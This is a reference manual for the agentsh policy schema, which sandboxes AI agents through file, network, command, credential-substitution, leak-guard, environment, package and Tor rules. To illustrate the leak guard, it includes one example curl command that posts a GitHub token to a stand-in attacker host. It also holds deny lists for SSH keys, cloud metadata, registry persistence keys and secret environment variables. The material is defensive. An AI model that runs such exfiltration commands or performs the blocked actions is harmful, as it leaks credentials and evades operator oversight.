Policy Reference

Deterministic policy schema for controlling file, network, command, signal, registry, package, and Postgres-family database access at the execution layer.

Policy Model#

Decisions

Decision	Description
`allow`	Permit the operation
`deny`	Block the operation
`approve`	Require human approval
`redirect`	Swap to a different target
`audit`	Allow + log (explicit logging)
`soft_delete`	Quarantine with restore option

Scopes

File operations
Commands
Environment variables
Network (DNS/connect)
Database connections and statements
PTY/session settings
Signals (Linux only for blocking)
Registry (Windows only)

Evaluation

First matching rule wins. Rules live in a named policy; sessions choose a policy at creation time.

File Rules#

Control file system operations by path and operation type.

file_rules:
  # Allow reading workspace
  - name: allow-workspace-read
    paths:
      - "/workspace"
      - "/workspace/**"
    operations: [read, open, stat, list, readlink]
    decision: allow

  # Require approval for deletes
  - name: approve-workspace-delete
    paths: ["/workspace/**"]
    operations: [delete, rmdir]
    decision: approve
    message: "Agent wants to delete: {{.Path}}"
    timeout: 5m

  # Block sensitive paths
  - name: deny-ssh-keys
    paths: ["/home/**/.ssh/**", "/root/.ssh/**"]
    operations: ["*"]
    decision: deny

Operations: read, open, stat, list, readlink, write, create, mkdir, chmod, rename, delete, rmdir, * (all)

Network Rules#

Control network connections by domain, CIDR, or port.

network_rules:
  # Allow package registries
  - name: allow-npm
    domains: ["registry.npmjs.org", "*.npmjs.org"]
    ports: [443, 80]
    decision: allow

  # Block private networks
  - name: block-private
    cidrs:
      - "10.0.0.0/8"
      - "172.16.0.0/12"
      - "192.168.0.0/16"
    decision: deny

  # Block cloud metadata
  - name: block-metadata
    cidrs: ["169.254.169.254/32"]
    decision: deny

  # Approve unknown HTTPS
  - name: approve-unknown
    ports: [443]
    decision: approve
    message: "Connect to {{.RemoteAddr}}:{{.RemotePort}}?"

HTTP Services#

HTTP services let you give an agent fine-grained access to third-party APIs — GitHub, Stripe, Slack, Jira, and others — without ever exposing the real credential. Each entry in the http_services: key declares everything in one place: the upstream URL, path/method filtering rules, and credential substitution settings.

http_services:
  - name: github
    upstream: https://api.github.com
    default: deny
    rules:
      - name: read-issues
        methods: [GET]
        paths: ["/repos/myorg/*/issues", "/repos/myorg/*/issues/*"]
        decision: allow
    secret:
      ref: vault://kv/github#token
      format: "ghp_{rand:36}"
    inject:
      header:
        name: Authorization
        template: "Bearer {{secret}}"
    scrub_response: true

The three pieces of each entry:

Routing & filtering (upstream, rules, default) — the agent calls /svc/<name>/... on the local gateway; agentsh matches the path and method against the declared rules and forwards approved requests upstream.
Credential substitution (secret, inject, scrub_response) — agentsh fetches the real credential from a secrets provider, generates a format-matched fake for the agent, and swaps fake → real on the wire.
Leak guard (automatic) — if the agent sends a fake credential to any host other than the entry's upstream, the request is blocked.

An entry can use all three pieces together (the common case), or use only routing (for open APIs that don't need credentials) or only credentials (for services where the agent already knows the endpoint). An entry must declare at least one of rules or secret.

When to use http_services instead of network_rules. Use http_services when you want fine-grained control over which API paths and methods the agent may call, combined with credential substitution. Use network_rules for everything else: arbitrary outbound HTTP, non-HTTP protocols, or cases where you don't need path-level filtering or credential management.

What does not fit http_services:

GraphQL APIs — Linear, GitHub v4, Hasura, Shopify, and other GraphQL endpoints expose all operations through a single /graphql path with the operation name in the request body. Path-based rules cannot distinguish operations. Use network_rules with a host allow-list for these.
Anthropic and OpenAI completion APIs — these are already covered by the agentsh DLP proxy (a separate feature). Do not duplicate them as http_services.

Routing & Filtering#

Each http_services: entry names a service, points it at an upstream URL, and declares path/method rules that control what the agent may access. The complete schema:

http_services:
  - name: github                       # service identifier; agent calls /svc/github/...
    upstream: https://api.github.com   # upstream URL
    expose_as: GITHUB_API_URL          # optional env var name; derived from name if empty
    aliases:                           # optional extra hostnames for fail-closed checks
      - api.github.example.com
    allow_direct: false                # escape hatch; default false
    default: deny                      # allow | deny; default depends on context

    # Path/method filtering rules (optional)
    rules:
      - name: read-contents
        methods: [GET]                 # empty list or "*" means any method
        paths: ["/repos/myorg/myrepo/contents/**"]
        decision: allow
      - name: read-write-issues
        methods: [GET, POST]
        paths: ["/repos/myorg/myrepo/issues", "/repos/myorg/myrepo/issues/*"]
        decision: allow

    # Credential substitution (optional)
    secret:
      ref: vault://kv/github#token     # secrets URI
      format: "ghp_{rand:36}"          # fake credential format
    inject:
      header:
        name: Authorization
        template: "Bearer {{secret}}"
    scrub_response: true               # replace real creds in responses with fakes

Service-level fields:

name (string, required) — identifier used in the gateway URL /svc/<name>/... and in audit logs. Must be a valid URL path segment.
upstream (string, required) — the upstream API URL. The path component of upstream is preserved on forwarded requests. Bare unbracketed IPv6 addresses are rejected by the URL canonicalizer. Use the bracketed form: https://[2001:db8::1]:443.
expose_as (string, optional) — environment variable name agentsh will set to the gateway URL inside the sandbox. If empty, derived from name (e.g., github → GITHUB_API_URL).
aliases (list of strings, optional) — extra hostnames recognized as belonging to this service for fail-closed checks. Useful for upstream APIs with regional hostnames.
allow_direct (bool, optional, default false) — escape hatch allowing the agent to bypass the gateway and call the upstream URL directly. Off by default.
default (string, optional) — allow or deny. The decision used when no rule matches. Defaults to deny when rules are present; defaults to allow for credential-only entries (no rules, has secret).
rules (list, optional) — an ordered list of path/method rules. First match wins.
secret (object, optional) — credential source and fake format. See Credential Substitution.
inject (object, optional) — how to inject the real credential on the wire. Requires secret.
scrub_response (bool, optional) — scan response bodies for the real credential and replace with the fake. Defaults based on whether secret is present.

Per-rule fields under rules::

name (string, required) — rule identifier shown in audit logs.
methods (list of strings, optional) — HTTP methods this rule applies to. An empty list or "*" both mean "any method".
paths (list of strings, required) — plural. List of glob patterns matched against the request path using gobwas/glob with / as the separator.
decision (string, required) — one of allow, deny, approve, or audit.
message (string, optional) — a plain-text message recorded in the audit log alongside the rule decision. Useful for documenting an unusual allow rule.
timeout (duration, optional) — parsed but not yet enforced (see Limitations).

Rule matching#

Each rule under rules: matches an incoming request by both its path and its method. agentsh evaluates rules in declaration order; the first rule whose path glob and method list both match wins. If no rule matches, the service's default: applies (which itself defaults to deny). This subsection covers the two parts users get wrong most often: how the path glob behaves, and how to order rules so the right one wins.

Path matching

Paths are gobwas/glob patterns with / as the separator. * matches any sequence of non-separator characters; ** matches across separators; ? matches a single character; [abc] matches a character class. Patterns match against the request path relative to the service's upstream — the gateway prefix /svc/<name> has already been stripped by the time the rule engine sees the path.

Pattern	Matches	Does not match
`/users`	`/users`	`/users/123`
`/users/*`	`/users/123`	`/users/123/posts`
`/users/**`	`/users/123/posts` and `/users/123`	`/orgs`
`/repos//contents/*`	`/repos/myorg/myrepo/contents/src/file.go`	`/repos/myorg`

Method matching

The methods: field lists HTTP methods the rule applies to, e.g., methods: [GET, POST]. Two shorthand forms also match any method: omitting the field entirely, and the literal value methods: ["*"].

First-match semantics

When two rules could both match a request, the rule that appears first in the rules: list wins. Order rules from most specific to least specific. The classic mistake is to put a broad allow first and an exception deny second — the broad allow consumes the request and the deny is never reached. Always put the exception first:

http_services:
  - name: github
    upstream: https://api.github.com
    default: deny
    rules:
      # Deny FIRST: a narrow exception inside an otherwise-allowed range
      - name: block-secrets-dir
        methods: [GET]
        paths: ["/repos/myorg/myrepo/contents/secrets/**"]
        decision: deny
        message: "Block read access to secrets directory"

      # Then the broad allow
      - name: allow-repo-reads
        methods: [GET]
        paths: ["/repos/myorg/myrepo/contents/**"]
        decision: allow

If you reversed the order, the broad allow-repo-reads would match a request to /repos/myorg/myrepo/contents/secrets/db.env and the narrower deny would never fire.

Decision values

The decision: field on each rule takes one of four values:

allow — forward the request to upstream with credentials substituted (if applicable). The default for matched rules.
deny — reject the request without forwarding. Returns an HTTP error to the agent.
approve — request interactive approval when an approvals manager is configured; otherwise fail closed with HTTP 501.
audit — forward the request and record the declared-service audit path.

Credential Substitution#

Credential substitution is declared directly on each http_services: entry via the secret, inject, and scrub_response fields. At session start, agentsh fetches the real credential, generates a format-matched fake, and exposes only the fake to the agent. On the wire, fake credentials are swapped for real ones transparently.

secret

The secret object tells agentsh where to find the real credential and how to generate its fake replacement:

secret.ref (string, required) — a secrets URI identifying the real credential. Resolved at session start and cached for the session lifetime. Example: vault://kv/github#token.
secret.format (string, required) — the format string for the fake credential. Must contain exactly one {rand:N} placeholder (see fake_format syntax below).

inject

The inject object controls how the real credential is placed on outbound requests. Requires secret to be set.

inject.header.name (string, required when inject is set) — the HTTP header name, e.g., Authorization.
inject.header.template (string, required when inject is set) — the header value template. Must contain the literal {{secret}}, which is replaced with the real credential at send time. Example: "Bearer {{secret}}".

scrub_response

When scrub_response: true, the post-hook scans response bodies for the real credential and replaces it with the fake before returning to the agent. Use this for endpoints that echo the credential back (e.g., a "whoami" endpoint that returns the bearer token in JSON).

fake_format syntax

The secret.format string must contain exactly one {rand:N} placeholder, where N is the number of random base62 characters to generate. The placeholder may be preceded by a literal prefix (e.g., the upstream API's token prefix) but it must appear at the end of the string — no characters after it.

Constraints:

{rand:N} is the only template token
It must appear exactly once
It must be at the end of the format string (no trailing characters after the closing })
N must be at least 24 (the constant minFakeEntropy; 24 base62 chars give ~143 bits of entropy)
The total length of the generated fake (len(prefix) + N) must equal the length of the real credential at substitution time — otherwise the substitution fails with ErrFakeLengthMismatch

Base62 alphabet used: A-Z a-z 0-9.

Per-provider fake format suggestions

These suggestions match the real-credential prefixes used by each upstream API. Use them when wiring up a new service so the fake is indistinguishable from a real token at the format level. Adjust N upward if your upstream's tokens are longer.

Upstream API	Real prefix	Suggested format
GitHub PAT (classic)	`ghp_`	`"ghp_{rand:36}"`
GitHub PAT (fine-grained)	`github_pat_`	`"github_pat_{rand:72}"`
Stripe (secret key)	`sk_live_` / `sk_test_`	`"sk_test_{rand:24}"`
Slack bot token	`xoxb-`	`"xoxb-{rand:48}"`
Slack user token	`xoxp-`	`"xoxp-{rand:48}"`
Jira / Atlassian API token	(no prefix)	`"{rand:24}"`
PagerDuty	(no prefix)	`"{rand:24}"`
Datadog API key	(no prefix)	`"{rand:32}"`
SendGrid	`SG.`	`"SG.{rand:66}"`

Note on Anthropic and OpenAI keys: These are handled by the agentsh DLP proxy, a separate feature. Do not declare an http_services entry for Anthropic or OpenAI completion endpoints.

Wire-level flow

When the agent sends a request through the gateway, agentsh processes it in five steps:

Route: The gateway receives the request at /svc/<name>/..., strips the prefix, and matches path + method against the declared rules. If the decision is deny, the request stops here.
Substitute: If the entry has a secret, the CredsSubHook pre-hook scans the request body, all header values, the URL query string, and the URL path for the fake credential and replaces each occurrence with the real one.
Inject: If inject.header is set, agentsh sets the header from the template (overwriting any value the agent supplied).
Forward: The request goes to the upstream URL with real credentials in place.
Scrub: When scrub_response: true, the post-hook scans the response body for the real credential and replaces it with the fake before returning to the agent.

Leak Guard#

The leak guard is the third hook in the credential pipeline (after the substitution and header-injection hooks). It enforces that fake credentials never leave agentsh through any path other than the legitimate substitution flow. If the agent grabs a fake credential from its environment and tries to send it to a host that does not own that credential — an attacker-controlled endpoint, a logging service, a webhook, or even a different declared service — the leak guard intercepts and denies the request with HTTP 403.

Without the leak guard, an agent that learned its environment contained a credential could exfiltrate the fake to an attacker. The attacker would then try to use the fake against the upstream API and fail (because the fake doesn't authenticate), but they would have learned the agent's identity, the format of the credential, and potentially used the leak as a side-channel for other data.

What the leak guard inspects

For every outbound HTTPS request that the proxy sees, the LeakGuardHook scans:

The request body
Every request header value (including Authorization, custom headers, cookies)
The URL query string
The URL path (both decoded and raw forms)

It looks for any fake credential in agentsh's per-session table.

The cross-service rule

The check is cross-service, not blanket. A fake credential discovered on a request to its own service is fine — that's the legitimate substitution path, and the substitution hook will swap the fake for the real one before forwarding. The leak guard only blocks when a fake belongs to service A and the request is destined for service B (or to no declared service at all). Concretely:

Fake credential of service	Destination host	Outcome
github	api.github.com	Allowed — substituted by CredsSubHook
github	api.stripe.com	Blocked — fake of one service on another
github	attacker.example.com	Blocked — fake on an undeclared host
(none)	any	Not checked — nothing to leak

What the agent sees on a leak attempt

The denial returns HTTP 403 "credential leak blocked". The agent sees a normal-looking 403 from its outbound HTTP client — deliberately the same shape as a network policy denial, so the agent cannot infer "you tried to leak GitHub credentials" as a side-channel signal.

On the agentsh side, the event is logged via slog.Warn as secret_leak_blocked with structured fields session_id, request_id, service_name (the service the leaked fake belongs to), and request_host. This is a structured log line, not a typed audit event (see Known Limitations).

Coverage

The leak guard runs inside the same TLS-terminating proxy that handles substitution, so it inspects HTTPS traffic and plain HTTP traffic equally. Non-HTTP protocols and direct socket I/O are not inspected by the leak guard — those are governed by the broader network rules. If you allow raw outbound TCP to a host, the leak guard cannot scan it.

Examples#

GitHub — read-only repo access with Vault-sourced credentials

This is the most common pattern: routing + filtering + credential substitution in a single entry.

providers:
  vault:
    type: vault
    address: https://vault.corp.internal:8200
    auth:
      method: kubernetes
      kube_role: agentsh-prod

http_services:
  - name: github
    upstream: https://api.github.com
    expose_as: GITHUB_API_URL
    default: deny
    rules:
      - name: read-repo-contents
        methods: [GET]
        paths: ["/repos/myorg/myrepo/contents/**"]
        decision: allow
      - name: read-create-issues
        methods: [GET, POST]
        paths: ["/repos/myorg/myrepo/issues"]
        decision: allow
      - name: read-update-single-issue
        methods: [GET, PATCH]
        paths: ["/repos/myorg/myrepo/issues/*"]
        decision: allow
    secret:
      ref: vault://kv/github#token
      format: "ghp_{rand:36}"
    inject:
      header:
        name: Authorization
        template: "Bearer {{secret}}"
    scrub_response: true

At session start, agentsh:

Generates a fake token like ghp_aB3xZk9... (36 random base62 chars after the ghp_ prefix)
Sets GITHUB_API_URL in the sub-process env to the local gateway URL
Resolves vault://kv/github#token and caches the real token in memory

The agent calls:

curl -H "Authorization: Bearer $GITHUB_TOKEN" \
     "$GITHUB_API_URL/repos/myorg/myrepo/issues"

agentsh matches /repos/myorg/myrepo/issues against read-create-issues (GET allowed), swaps the fake token for the real one, forwards to https://api.github.com, and scrubs the real credential from the response before returning it to the agent.

Stripe — payments API with method restrictions

http_services:
  - name: stripe
    upstream: https://api.stripe.com
    default: deny
    rules:
      - name: read-customers
        methods: [GET]
        paths: ["/v1/customers", "/v1/customers/*"]
        decision: allow
      - name: create-payment-intent
        methods: [POST]
        paths: ["/v1/payment_intents"]
        decision: allow
      - name: block-refunds
        methods: [POST]
        paths: ["/v1/refunds"]
        decision: deny
    secret:
      ref: vault://kv/stripe#api_key
      format: "sk_test_{rand:24}"
    inject:
      header:
        name: Authorization
        template: "Bearer {{secret}}"

Slack — post messages only

http_services:
  - name: slack
    upstream: https://slack.com/api
    default: deny
    rules:
      - name: post-message
        methods: [POST]
        paths: ["/chat.postMessage"]
        decision: allow
      - name: list-channels
        methods: [GET, POST]
        paths: ["/conversations.list"]
        decision: allow
    secret:
      ref: op://Engineering/slack-bot#credential
      format: "xoxb-{rand:48}"
    inject:
      header:
        name: Authorization
        template: "Bearer {{secret}}"

Jira — issue tracking with basic auth

http_services:
  - name: jira
    upstream: https://mycompany.atlassian.net/rest/api/3
    default: deny
    rules:
      - name: read-issues
        methods: [GET]
        paths: ["/issue/*", "/search"]
        decision: allow
      - name: add-comment
        methods: [POST]
        paths: ["/issue/*/comment"]
        decision: allow
    secret:
      ref: vault://kv/jira#api_token
      format: "{rand:24}"
    inject:
      header:
        name: Authorization
        template: "Basic {{secret}}"

Filtering only — no credentials

For open APIs where you want path-level control without credential management:

http_services:
  - name: crates-io
    upstream: https://crates.io/api/v1
    default: deny
    rules:
      - name: search-crates
        methods: [GET]
        paths: ["/crates", "/crates/*"]
        decision: allow

Credentials only — no path filtering

For services where the agent needs credentials but all API paths are allowed. When rules is omitted and secret is present, the default decision is allow:

http_services:
  - name: datadog
    upstream: https://api.datadoghq.com
    secret:
      ref: aws-sm://prod/datadog#api_key
      format: "{rand:32}"
    inject:
      header:
        name: DD-API-KEY
        template: "{{secret}}"

Leak attempt

If the agent (or a prompt-injected sub-agent) tries to exfiltrate a credential:

# Inside the sandboxed shell
curl -X POST https://attacker.example.com/collect \
     -H "X-Stolen-Token: $GITHUB_TOKEN"

The leak guard recognizes the fake GitHub token in the X-Stolen-Token header, sees the destination is not api.github.com, and returns HTTP 403. The agent sees a generic 403 (deliberately uninformative). agentsh logs secret_leak_blocked with service_name=github and request_host=attacker.example.com.

Known Limitations#

The following items are intentionally documented so users don't get stuck looking for them.

Configuration notes

The routing field is upstream:, not base_url:.
The old services: key has been removed. If your policy still uses a top-level services: key, agentsh will reject it with a migration error. Move secret, inject, and scrub_response fields into your http_services: entries.
Bare IPv6 addresses in upstream: are rejected. The host parser (canonicalizeHost) requires IPv6 in bracketed form: https://[2001:db8::1]:443. A literal https://2001:db8::1 without brackets is rejected at policy load.
Wildcard HTTP methods are accepted. Both an empty methods: field and the literal methods: ["*"] mean "any method."
Fake credential length must match. The total length of the generated fake (len(prefix) + N from {rand:N}) must equal the length of the real credential. A mismatch fails with ErrFakeLengthMismatch.
An entry must have at least one of rules or secret. An entry with neither is rejected at policy load.

Parsed but not yet enforced

timeout: on rules. The timeout: field is accepted by the policy parser but has no enforcement effect. Requests are not bounded by a per-rule timeout. In the meantime, use OS-level timeouts in your agent runtime.

Not yet observable

No dedicated audit event types. There are no typed audit events for HTTP-services routing decisions, credential substitution, or secrets fetches. The leak guard emits a structured secret_leak_blocked warn-level slog line (with session_id, request_id, service_name, request_host), but this is a log record, not a typed event in the audit pipeline.

Workload patterns that don't fit

GraphQL APIs. Linear, GitHub v4, Hasura, Shopify, and other GraphQL endpoints expose all operations through a single /graphql path. Path-based rules cannot distinguish operations. For these, use network_rules with a host allow-list.
WebSocket and SSE endpoints. Long-lived bidirectional connections are not currently mediated by the http_services gateway. Use network_rules.
Anthropic and OpenAI completion endpoints. These are handled by the agentsh DLP proxy. Do not duplicate them as http_services entries.

Command Rules#

Pre-execution checks for commands. With execve interception enabled (Linux full mode), rules also apply to nested commands spawned by scripts.

command_rules:
  # Safe commands
  - name: allow-safe
    commands: [ls, cat, grep, find, pwd, echo, git, node, python]
    decision: allow

  # Approve package installs
  - name: approve-install
    commands: [npm, pip, cargo]
    args_patterns: ["install*", "add*"]
    decision: approve
    message: "Install packages: {{.Args}}"

  # Block dangerous patterns
  - name: block-rm-rf
    commands: [rm]
    args_patterns: ["*-rf*", "*-fr*"]
    decision: deny

  # Block system commands
  - name: block-system
    commands: [shutdown, reboot, systemctl, mount, dd, kill]
    decision: deny

Signal Rules#

Control which processes can send signals to which targets. Full blocking only on Linux; macOS and Windows provide audit only.

signal_rules:
  # Allow signals to self and children
  - name: allow-self
    signals: ["@all"]
    target:
      type: self
    decision: allow

  # Redirect SIGKILL to graceful SIGTERM
  - name: graceful-kill
    signals: ["SIGKILL"]
    target:
      type: children
    decision: redirect
    redirect_to: SIGTERM

  # Block fatal signals to external processes
  - name: deny-external-fatal
    signals: ["@fatal"]
    target:
      type: external
    decision: deny

  # Silently absorb job control signals from external sources
  - name: absorb-external-job
    signals: ["@job"]
    target:
      type: external
    decision: absorb

Signal groups:

@all - All signals (1-31)
@fatal - SIGKILL, SIGTERM, SIGQUIT, SIGABRT
@job - SIGSTOP, SIGCONT, SIGTSTP, SIGTTIN, SIGTTOU
@reload - SIGHUP, SIGUSR1, SIGUSR2

Target types: self, children, descendants, session, external, system

Signal decisions: allow, deny, audit, approve, redirect (to another signal), absorb (discard silently)

Registry Rules (Windows)#

Control Windows registry access. Requires mini filter driver.

registry_rules:
  # Block persistence locations
  - name: block-run-keys
    paths:
      - 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run*'
      - 'HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run*'
    operations: [write, create, delete]
    decision: deny

  # Block security settings
  - name: block-defender
    paths: ['HKLM\SOFTWARE\Policies\Microsoft\Windows Defender*']
    operations: [write, create, delete]
    decision: deny

  # Allow reads everywhere
  - name: allow-read
    paths: ["*"]
    operations: [read]
    decision: allow

Resource Limits#

Constrain resource usage per session. Full enforcement on Linux only.

resource_limits:
  # Memory
  max_memory_mb: 2048
  memory_swap_max_mb: 0

  # CPU
  cpu_quota_percent: 80

  # Disk I/O
  disk_read_bps_max: 104857600   # 100 MB/s
  disk_write_bps_max: 52428800   # 50 MB/s

  # Network
  net_bandwidth_mbps: 100

  # Process limits
  pids_max: 100

  # Time limits
  command_timeout: 5m
  session_timeout: 4h
  idle_timeout: 30m

MCP Rules#

The mcp_rules section in a policy file defines MCP security enforcement. This is the policy-file equivalent of the sandbox.mcp runtime configuration.

mcp_rules:
  enforce_policy: true

  # Server-level access control
  server_policy: "allowlist"
  allowed_servers:
    - id: "trusted_*"
  denied_servers:
    - id: "untrusted_*"

  # Tool-level access control
  tool_policy: "allowlist"
  allowed_tools:
    - server: "database"
      tool: "query_users"
      content_hash: "sha256:abc123..."
    - server: "notes"
      tool: "read_*"
  denied_tools:
    - server: "*"
      tool: "exec_*"

  # Version pinning
  version_pinning:
    enabled: true
    on_change: "block"
    auto_trust_first: true

  # Cross-server attack detection
  cross_server:
    enabled: true
    read_then_send:
      enabled: true
    burst:
      enabled: true

See the MCP Policy Configuration section for detailed descriptions of each option.

Environment Policy#

Control which environment variables processes can access.

Defaults: With no env_allow, agentsh builds a minimal env (PATH/LANG/TERM/HOME) and strips built-in secret keys
Overrides: Per-command env_allow/env_deny plus limits
Block iteration: env_block_iteration: true hides env enumeration

Global policy (applies to all commands)

env_policy:
  # Allowlist - only these vars are visible (supports wildcards)
  allow:
    - "PATH"
    - "HOME"
    - "LANG"
    - "TERM"
    - "NODE_*"          # All NODE_ prefixed vars
    - "npm_*"

  # Denylist - these are always stripped (even if in allow)
  deny:
    - "AWS_*"
    - "GITHUB_TOKEN"
    - "*_SECRET*"
    - "*_KEY"
    - "*_PASSWORD"

  # Size limits
  max_bytes: 1000000     # Max total env size
  max_keys: 100          # Max number of variables

  # Block enumeration (env, printenv, /proc/*/environ)
  block_iteration: true

Per-command overrides

Override the global policy for specific commands:

command_rules:
  # npm needs registry tokens
  - name: npm-with-tokens
    commands: [npm]
    decision: allow
    env_allow:
      - "NPM_TOKEN"
      - "NODE_AUTH_TOKEN"
    env_deny:
      - "AWS_*"           # Still deny cloud creds

  # Build tools get more env access
  - name: build-tools
    commands: [make, cargo, go]
    decision: allow
    env_allow:
      - "CC"
      - "CXX"
      - "GOPATH"
      - "CARGO_*"
    env_max_bytes: 500000
    env_max_keys: 50

  # Prevent scripts from discovering env vars
  - name: untrusted-scripts
    commands: [python, node, ruby]
    args_patterns: [".*\\.sh$", ".*eval.*"]
    decision: allow
    env_block_iteration: true

Environment Injection#

Inject operator-trusted environment variables into every command execution, regardless of the parent environment. Injected variables bypass env_policy filtering since they are configured by the operator.

Use cases

Shell builtin hardening: Set BASH_ENV to disable bash builtins that bypass seccomp policy (like kill, ulimit)
Runtime injection: Add variables for environments that strip Docker ENV (e.g., Blaxel)
Operator defaults: Configure variables that should always be present

Global configuration

Set in your config.yml to apply to all executions:

sandbox:
  env_inject:
    BASH_ENV: "/usr/lib/agentsh/bash_startup.sh"
    # Add custom variables as needed
    MY_CUSTOM_VAR: "value"

Policy-level configuration

Override or extend global settings in a policy file:

version: 1
name: my-policy

env_inject:
  BASH_ENV: "/etc/mycompany/bash_startup.sh"
  EXTRA_VAR: "policy-specific"

# ... rest of policy

Merge behavior

Start with global sandbox.env_inject
Layer policy env_inject on top
Policy wins on key conflicts
Result bypasses env_policy filtering (operator-trusted)

Bundled bash startup script

agentsh includes a script at /usr/lib/agentsh/bash_startup.sh that disables bash builtins which could bypass seccomp policy enforcement:

#!/bin/bash
# Disable builtins that bypass seccomp policy enforcement
enable -n kill      # Signal sending
enable -n enable    # Prevent re-enabling
enable -n ulimit    # Resource limits
enable -n umask     # File permission mask
enable -n builtin   # Force builtin bypass
enable -n command   # Function/alias bypass

This script is included in Linux packages (deb, rpm, arch, tarballs). Set BASH_ENV to this path to automatically disable these builtins in bash sessions.

Package Rules#

Package rules control what happens when an agent installs packages. Each rule has a match object and an action. Rules are evaluated top-to-bottom; the first match wins.

Field	Type	Description
`match.packages`	`string[]`	Exact package names
`match.name_patterns`	`string[]`	Glob/regex patterns for package names
`match.finding_type`	`string`	Type of finding: `vulnerability`, `license`, `malware`, `typosquat`, `provenance`, `reputation`
`match.severity`	`string`	Minimum severity: `critical`, `high`, `medium`, `low`, `info`
`match.reasons`	`string[]`	Specific reason codes to match
`match.license_spdx.allow`	`string[]`	Allowlisted SPDX license identifiers
`match.license_spdx.deny`	`string[]`	Denylisted SPDX license identifiers
`match.ecosystem`	`string`	Package ecosystem: `npm`, `pypi`, `cargo`, etc.
`action`	`string`	`allow`, `warn`, `approve`, or `block`
`reason`	`string`	Human-readable reason for the rule

package_rules:
  # Block critical vulnerabilities
  - match:
      finding_type: vulnerability
      severity: critical
    action: block
    reason: "Critical vulnerability detected"

  # Block malware and typosquats
  - match:
      finding_type: malware
    action: block

  - match:
      finding_type: typosquat
    action: block

  # Block copyleft licenses
  - match:
      finding_type: license
      license_spdx:
        deny: [GPL-2.0-only, GPL-3.0-only, AGPL-3.0-only]
    action: block

  # Warn on medium vulnerabilities
  - match:
      finding_type: vulnerability
      severity: medium
    action: warn

  # Allow a specific trusted package regardless of findings
  - match:
      packages: [lodash]
    action: allow

DNS Redirects#

DNS redirect rules steer domain resolution for governed processes. When an active DNS interception backend sees a domain matching a rule, the DNS response is rewritten to the specified IP address. Runtime support depends on the active backend; Linux transparent DNS and ptrace-backed DNS paths enforce these rules.

Field	Type	Description
`name`	`string`	Rule name (for logging)
`match`	`string`	Regex pattern to match against the queried domain
`resolve_to`	`string`	IP address to return instead of the real resolution
`visibility`	`string`	`silent`, `audit_only`, or `warn`
`on_failure`	`string`	`fail_closed`, `fail_open`, or `retry_original`

dns_redirects:
  # Redirect npm registry to internal mirror
  - name: npm-mirror
    match: "^registry\\.npmjs\\.org$"
    resolve_to: "10.0.1.50"
    visibility: audit_only
    on_failure: retry_original

  # Redirect all PyPI traffic
  - name: pypi-mirror
    match: "^(files|upload)\\.pythonhosted\\.org$"
    resolve_to: "10.0.1.51"
    visibility: silent
    on_failure: fail_closed

Connect Redirects#

Connect redirect rules steer outbound TCP connections at the syscall layer. When a governed process connects to a host:port matching a rule, the connection is redirected to either another TCP destination or a Unix socket. Supports optional TLS SNI rewriting for TCP targets. Database unavoidability uses the Unix-socket target form.

Field	Type	Description
`name`	`string`	Rule name (for logging)
`match`	`string`	Regex pattern to match against `host:port`
`redirect_to`	`string`	New TCP `host:port` destination. Exactly one of `redirect_to` or `redirect_to_unix` is required.
`redirect_to_unix`	`string`	Unix socket path target. Used by generated database proxy routing rules.
`tls.mode`	`string`	`passthrough` or `rewrite_sni`
`tls.sni`	`string`	New SNI value (required when `mode` is `rewrite_sni`)
`visibility`	`string`	`silent`, `audit_only`, or `warn`
`on_failure`	`string`	`fail_closed`, `fail_open`, or `retry_original`

connect_redirects:
  # Route API traffic through internal proxy
  - name: api-proxy
    match: "^api\\.openai\\.com:443$"
    redirect_to: "proxy.internal:8443"
    tls:
      mode: rewrite_sni
      sni: "api.openai.com"
    visibility: audit_only
    on_failure: fail_closed

  # Route database traffic to a per-session Unix socket
  - name: appdb-proxy
    match: "^pg\\.internal:5432$"
    redirect_to_unix: "/run/agentsh/sess-123/db-services/appdb.sock"
    visibility: audit_only
    on_failure: fail_closed

redirect_to_unix is primarily generated by agentsh for db_services. Operators normally declare the database service and policies.db.unavoidability rather than hand-writing the Unix socket redirect.

Tor Access Control#

The top-level tor: block is a deny-by-default coordinating macro: a single intent (deny | audit | allow) expands into consistent enforcement across the five distinct ways a sandboxed process can reach the Tor network. Tor traffic is encrypted to relays, so once an agent is on Tor its real destinations are invisible to every IP, DNS, and host control agentsh has — the only effective response is to stop the agent reaching Tor in the first place. Every match emits a tor_control audit event tagged with the vector that fired.

Deny-by-default. With no tor: block configured at all, Tor is denied. The default posture requires no external network fetch — it relies on the four cheap doors (client binaries, local SOCKS/control ports, .onion DNS, .onion HTTP) plus a built-in set of Tor directory-authority IPs that alone break Tor bootstrap.

The five vectors

Vector toggle	What it catches	Event vector
`processes`	Agent runs `tor`, `torsocks`, or a pluggable transport (`obfs4proxy`, `snowflake-client`, `lyrebird`, `meek-client`) — denied at `execve`	`process`
`socks_ports`	App speaks SOCKS to a local Tor daemon (`127.0.0.1:9050/9150`) or its control port (`9051`)	`socks_port`
`onion`	A `.onion` name reaches the resolver (refused) or a `.onion` Host is fetched through the agentsh HTTP proxy (403)	`onion_dns`, `onion_http`
`relay_ips`	The Tor daemon dials guard / middle / exit / directory-authority IPs directly	`relay_ip`

Blocking .onion over DNS while permitting it over the HTTP proxy is incoherent, so a single vectors.onion toggle governs both enforcement points. The other vectors remain independently toggleable.

tor:
  # Deny-by-default: omitting the whole block denies Tor.
  enabled: true              # *bool tri-state; absent → true
  mode: deny                 # deny (default) | audit | allow

  # All vectors default true. Relax one door without losing the rest.
  vectors:
    processes:   true
    socks_ports: true
    onion:       true      # one toggle for both .onion DNS and .onion HTTP
    relay_ips:   true

  client_binaries: [tor, obfs4proxy, snowflake-client, lyrebird, meek-client, torsocks]
  socks_ports:     [9050, 9150]
  control_ports:   [9051]
  socks_loopback_only: true  # only treat those ports as Tor when the dest is loopback

  relay_feed:                # optional; deny-by-default does NOT require it
    enabled: false
    sources: ["https://onionoo.torproject.org/details"]
    local_lists: ["/etc/agentsh/tor-relays.txt"]
    sync_interval: 6h

  # allow-mode only: per-.onion gateway rules (first match wins)
  onion_rules:
    - onion: "*.example-service.onion"
      decision: allow
    - onion: "*"
      decision: deny

Modes

deny (default) — on a Tor match, short-circuit to deny and emit tor_control{decision:deny}. A Tor match overrides any user allow rule.
audit — emit tor_control{decision:audit} but never block on Tor's account; evaluation falls through to normal policy (a user rule may still deny it — audit never loosens a decision). Use this to observe Tor activity before tightening to deny.
allow — Tor is permitted. Normal network policy still applies to non-Tor traffic. onion_rules (the onion gateway, below) scope which destinations the local Tor may reach.

